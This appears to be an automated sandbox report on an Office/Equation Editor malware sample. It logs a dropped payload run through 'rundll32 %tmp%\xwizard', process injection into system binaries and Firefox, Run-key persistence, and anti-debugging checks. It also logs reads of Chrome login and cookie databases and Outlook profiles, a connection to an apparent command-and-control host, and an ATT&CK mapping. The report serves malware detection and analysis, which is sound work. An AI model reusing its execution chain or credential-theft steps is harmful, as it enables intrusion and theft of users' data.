              Source: C:\Windows\SysWOW64\convert.exe - Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run ANPPAN

              Hooking and other Techniques for Hiding and Protection

              Source: C:\Windows\System32\rundll32.exe - Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\WCC8DC.TMP
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE - Process information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE - Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\cmd.exe - Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\rundll32.exe - Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\rundll32.exe - Process information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe - Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\convert.exe - Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\convert.exe - Process information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe - Code function: 9_2_008D0101 rdtsc 9_2_008D0101
              Source: C:\Windows\SysWOW64\convert.exe - Window / User API: threadDelayed 9827
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE - Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xwizard
              Source: C:\Windows\SysWOW64\convert.exe - Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\sqlite3.dll
              Source: C:\Windows\System32\rundll32.exe - Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wcC8DC.tmp
              Source: C:\Windows\SysWOW64\convert.exe - API coverage: 2.5 %
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3444 - Thread sleep time: -120000s >= -30000s
              Source: C:\Windows\SysWOW64\convert.exe TID: 3712 - Thread sleep count: 131 > 30
              Source: C:\Windows\SysWOW64\convert.exe TID: 3712 - Thread sleep time: -262000s >= -30000s
              Source: C:\Windows\SysWOW64\convert.exe TID: 3840 - Thread sleep time: -120000s >= -30000s
              Source: C:\Windows\SysWOW64\convert.exe TID: 3712 - Thread sleep count: 9827 > 30
              Source: C:\Windows\SysWOW64\convert.exe TID: 3712 - Thread sleep time: -19654000s >= -30000s
              Source: C:\Windows\SysWOW64\convert.exe - Last function: Thread delayed
              Source: C:\Windows\SysWOW64\convert.exe - File Volume queried: C:\Users\user\AppData\Local FullSizeInformation
              Source: C:\Windows\SysWOW64\convert.exe - File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
              Source: C:\Windows\SysWOW64\convert.exe - Code function: 11_2_61E18C7E sqlite3_os_init,GetSystemInfo,sqlite3_vfs_register,sqlite3_vfs_register,sqlite3_vfs_register,sqlite3_vfs_register,11_2_61E18C7E
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe - Process information queried: ProcessInformation
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE - Process queried: DebugPort
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe - Process queried: DebugPort
              Source: C:\Windows\SysWOW64\convert.exe - Process queried: DebugPort
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe - Code function: 9_2_008D0101 rdtsc 9_2_008D0101
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe - Code function: 9_2_008807AC NtCreateMutant,LdrInitializeThunk,9_2_008807AC
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe - Code function: 9_2_00870080 mov ecx, dword ptr fs:[00000030h] 9_2_00870080
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe - Code function: 9_2_008700EA mov eax, dword ptr fs:[00000030h] 9_2_008700EA
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe - Code function: 9_2_008926F8 mov eax, dword ptr fs:[00000030h] 9_2_008926F8

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Windows\System32\rundll32.exe - Domain query: www.diced.jp
              Source: C:\Windows\System32\rundll32.exe - Network Connect: 153.121.40.91 443
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe - NtQueryInformationProcess: Direct from: 0x774CFAFA
              Source: C:\Windows\System32\rundll32.exe - NtRequestWaitReplyPort: Direct from: 0x1F7741
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe - NtCreateUserProcess: Direct from: 0x774D093E
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe - NtCreateKey: Direct from: 0x774CFB62
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe - NtQuerySystemInformation: Direct from: 0x774D20DE
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe - NtQueryDirectoryFile: Direct from: 0x774CFDBA
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe - NtClose: Direct from: 0x774CFA02
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe - NtWriteVirtualMemory: Direct from: 0x774D213E
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe - NtCreateFile: Direct from: 0x774D00D6
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe - NtSetTimer: Direct from: 0x774D021A
              Source: C:\Windows\System32\rundll32.exe - NtSetInformationThread: Direct from: 0xFFF2302B
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe - NtOpenFile: Direct from: 0x774CFD86
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe - NtOpenKeyEx: Direct from: 0x774CFA4A
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe - NtAllocateVirtualMemory: Direct from: 0x774CFAE2
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe - NtResumeThread: Direct from: 0x774D008D
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe - NtOpenKeyEx: Direct from: 0x774D103A
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe - NtUnmapViewOfSection: Direct from: 0x774CFCA2
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe - NtDelayExecution: Direct from: 0x774CFDA1
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe - NtSetInformationProcess: Direct from: 0x774CFB4A
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe - NtSetInformationThread: Direct from: 0x774CF9CE
              Source: C:\Windows\System32\rundll32.exe - NtDeviceIoControlFile: Direct from: 0x772FA561
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe - NtReadFile: Direct from: 0x774CF915
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe - NtMapViewOfSection: Direct from: 0x774CFC72
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe - NtCreateThreadEx: Direct from: 0x774D08C6
              Source: C:\Windows\System32\rundll32.exe - NtWriteFile: Direct from: 0x1F18A0
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe - NtDeviceIoControlFile: Direct from: 0x774CF931
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe - NtRequestWaitReplyPort: Direct from: 0x753C6BCE
              Source: C:\Windows\System32\rundll32.exe - NtClose: Direct from: 0x1DD6F4
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe - NtQueryValueKey: Direct from: 0x774CFACA
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe - NtOpenSection: Direct from: 0x774CFDEA
              Source: C:\Windows\System32\rundll32.exe - NtAllocateVirtualMemory: Direct from: 0x1C69EF
              Source: C:\Windows\System32\rundll32.exe - NtCreateFile: Direct from: 0x1F15EF
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe - NtProtectVirtualMemory: Direct from: 0x774D005A
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe - NtSetInformationThread: Direct from: 0x774CFF12
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe - NtWriteVirtualMemory: Direct from: 0x774CFE36
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeNtRequestWaitReplyPort: Direct from: 0x756F8D92Jump to behavior
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeNtQueryVolumeInformationFile: Direct from: 0x774CFFAEJump to behavior
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeNtNotifyChangeKey: Direct from: 0x774D0F92Jump to behavior
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeNtQueryAttributesFile: Direct from: 0x774CFE7EJump to behavior
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeNtReadVirtualMemory: Direct from: 0x774CFEB2Jump to behavior
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeNtSetTimer: Direct from: 0x774E98D5Jump to behavior
              Source: C:\Windows\System32\rundll32.exeNtMapViewOfSection: Direct from: 0x1F6383Jump to behavior
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeNtSetInformationFile: Direct from: 0x774CFC5AJump to behavior
              Source: C:\Windows\System32\rundll32.exeNtUnmapViewOfSection: Direct from: 0x1DD656Jump to behavior
              Source: C:\Windows\System32\rundll32.exeNtUnmapViewOfSection: Direct from: 0xFFF22F5BJump to behavior
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeNtQuerySystemInformation: Direct from: 0x774CFDD2Jump to behavior
              Source: C:\Windows\System32\rundll32.exe Section loaded: NULL target: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe protection: readonly
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe Section loaded: NULL target: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe protection: execute and read and write
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe Section loaded: NULL target: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe protection: execute and read and write
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe Section loaded: NULL target: C:\Windows\SysWOW64\convert.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\convert.exe Section loaded: NULL target: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe protection: read write
              Source: C:\Windows\SysWOW64\convert.exe Section loaded: NULL target: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\convert.exe Section loaded: NULL target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: read write
              Source: C:\Windows\SysWOW64\convert.exe Section loaded: NULL target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\convert.exe Thread APC queued: target process: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Windows\SysWOW64\cmd.exe CmD.exe /C rundll32 %tmp%\xwizard.,IEX A C
              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\xwizard.,IEX A C
              Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\xwizard.,IEX A C
              Source: C:\Windows\System32\rundll32.exe Process created: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe Process created: C:\Windows\SysWOW64\convert.exe "C:\Windows\SysWOW64\convert.exe"
              Source: C:\Windows\SysWOW64\convert.exe Process created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"
              Source: mVjlVtpvDsvJ.exe, 0000000A.00000002.648495302.0000000001290000.00000002.00000001.00040000.00000000.sdmp, mVjlVtpvDsvJ.exe, 0000000A.00000000.478874485.0000000001290000.00000002.00000001.00040000.00000000.sdmp, mVjlVtpvDsvJ.exe, 0000000C.00000000.510305712.0000000001290000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
              Source: mVjlVtpvDsvJ.exe, 0000000A.00000002.648495302.0000000001290000.00000002.00000001.00040000.00000000.sdmp, mVjlVtpvDsvJ.exe, 0000000A.00000000.478874485.0000000001290000.00000002.00000001.00040000.00000000.sdmp, mVjlVtpvDsvJ.exe, 0000000C.00000000.510305712.0000000001290000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
              Source: mVjlVtpvDsvJ.exe, 0000000A.00000002.648495302.0000000001290000.00000002.00000001.00040000.00000000.sdmp, mVjlVtpvDsvJ.exe, 0000000A.00000000.478874485.0000000001290000.00000002.00000001.00040000.00000000.sdmp, mVjlVtpvDsvJ.exe, 0000000C.00000000.510305712.0000000001290000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: !Progman
              Source: C:\Windows\SysWOW64\convert.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1xhx8.zip VolumeInformation
              Source: C:\Windows\SysWOW64\convert.exe Code function: 11_2_61E90550 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information

              Source: Yara matchFile source: 9.2.ImagingDevices.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000B.00000002.648541156.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.497403170.00000000001E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.497434362.0000000000401000.00000040.00000001.01000000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.648550804.0000000000840000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.648430732.00000000008F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.553330249.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.648308986.0000000000100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.497567649.0000000002200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\SysWOW64\convert.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Windows\SysWOW64\convert.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
              Source: C:\Windows\SysWOW64\convert.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Windows\SysWOW64\convert.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
              Source: C:\Windows\SysWOW64\convert.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
              Source: C:\Windows\SysWOW64\convert.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503Jump to behavior
              Source: C:\Windows\SysWOW64\convert.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046Jump to behavior
              Source: C:\Windows\SysWOW64\convert.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45aJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789Jump to behavior
              Source: C:\Windows\SysWOW64\convert.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1Jump to behavior
              Source: C:\Windows\SysWOW64\convert.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743Jump to behavior
              Source: C:\Windows\SysWOW64\convert.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11Jump to behavior
              Source: C:\Windows\SysWOW64\convert.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35Jump to behavior
              Source: C:\Windows\SysWOW64\convert.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4addJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046Jump to behavior
              Source: C:\Windows\SysWOW64\convert.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2Jump to behavior
              Source: C:\Windows\SysWOW64\convert.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: C:\Windows\SysWOW64\convert.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
              Source: C:\Windows\SysWOW64\convert.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
              Source: C:\Windows\SysWOW64\convert.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
              Source: C:\Windows\SysWOW64\convert.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35Jump to behavior
              Source: C:\Windows\SysWOW64\convert.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761Jump to behavior
              Source: C:\Windows\SysWOW64\convert.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7Jump to behavior
              Source: C:\Windows\SysWOW64\convert.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001Jump to behavior

              Remote Access Functionality

              Source: Yara matchFile source: 9.2.ImagingDevices.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000B.00000002.648541156.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.497403170.00000000001E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.497434362.0000000000401000.00000040.00000001.01000000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.648550804.0000000000840000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.648430732.00000000008F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.553330249.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.648308986.0000000000100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.497567649.0000000002200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\SysWOW64\convert.exeCode function: 11_2_61E2B1B1 sqlite3_bind_zeroblob,sqlite3_mutex_leave,11_2_61E2B1B1
              Source: C:\Windows\SysWOW64\convert.exeCode function: 11_2_61E2B134 sqlite3_bind_pointer,sqlite3_mutex_leave,11_2_61E2B134
              Source: C:\Windows\SysWOW64\convert.exeCode function: 11_2_61E2B103 sqlite3_bind_null,sqlite3_mutex_leave,11_2_61E2B103
              Source: C:\Windows\SysWOW64\convert.exeCode function: 11_2_61E10104 sqlite3_mutex_enter,sqlite3_mutex_leave,sqlite3_transfer_bindings,11_2_61E10104
              Source: C:\Windows\SysWOW64\convert.exeCode function: 11_2_61E2B0DD sqlite3_bind_int,sqlite3_bind_int64,11_2_61E2B0DD
              Source: C:\Windows\SysWOW64\convert.exeCode function: 11_2_61E2B08E sqlite3_bind_int64,sqlite3_mutex_leave,11_2_61E2B08E
              Source: C:\Windows\SysWOW64\convert.exeCode function: 11_2_61E2B029 sqlite3_bind_double,sqlite3_mutex_leave,11_2_61E2B029
              Source: C:\Windows\SysWOW64\convert.exeCode function: 11_2_61E2B002 sqlite3_bind_text16,11_2_61E2B002
              Source: C:\Windows\SysWOW64\convert.exeCode function: 11_2_61E2B305 sqlite3_bind_zeroblob64,sqlite3_mutex_enter,sqlite3_bind_zeroblob,sqlite3_mutex_leave,11_2_61E2B305
              Source: C:\Windows\SysWOW64\convert.exeCode function: 11_2_61E032E0 sqlite3_bind_parameter_name,11_2_61E032E0
              Source: C:\Windows\SysWOW64\convert.exeCode function: 11_2_61E032CE sqlite3_bind_parameter_count,11_2_61E032CE
              Source: C:\Windows\SysWOW64\convert.exeCode function: 11_2_61E2B21E sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_blob,11_2_61E2B21E
              Source: C:\Windows\SysWOW64\convert.exeCode function: 11_2_61E1346A sqlite3_bind_parameter_index,11_2_61E1346A
              Source: C:\Windows\SysWOW64\convert.exeCode function: 11_2_61E0FFB4 sqlite3_clear_bindings,sqlite3_mutex_enter,sqlite3_mutex_leave,11_2_61E0FFB4
              Source: C:\Windows\SysWOW64\convert.exeCode function: 11_2_61E2AF95 sqlite3_bind_text64,11_2_61E2AF95
              Source: C:\Windows\SysWOW64\convert.exeCode function: 11_2_61E2AF6E sqlite3_bind_text,11_2_61E2AF6E
              Source: C:\Windows\SysWOW64\convert.exeCode function: 11_2_61E2AF27 sqlite3_bind_blob64,11_2_61E2AF27
              Source: C:\Windows\SysWOW64\convert.exeCode function: 11_2_61E2AF00 sqlite3_mutex_leave,sqlite3_bind_blob,11_2_61E2AF00
              | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
              |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
              | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 33 Exploitation for Client Execution | 11 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | 1 Deobfuscate/Decode Files or Information | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
              | Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 Registry Run Keys / Startup Folder | 11 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | LSASS Memory | 1 File and Directory Discovery | Remote Desktop Protocol | 1 Browser Session Hijacking | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
              | Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 312 Process Injection | 3 Obfuscated Files or Information | Security Account Manager | 16 System Information Discovery | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
              | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 Registry Run Keys / Startup Folder | 2 Software Packing | NTDS | 12 Security Software Discovery | Distributed Component Object Model | 1 Email Collection | 5 Application Layer Protocol | Traffic Duplication | Data Destruction |
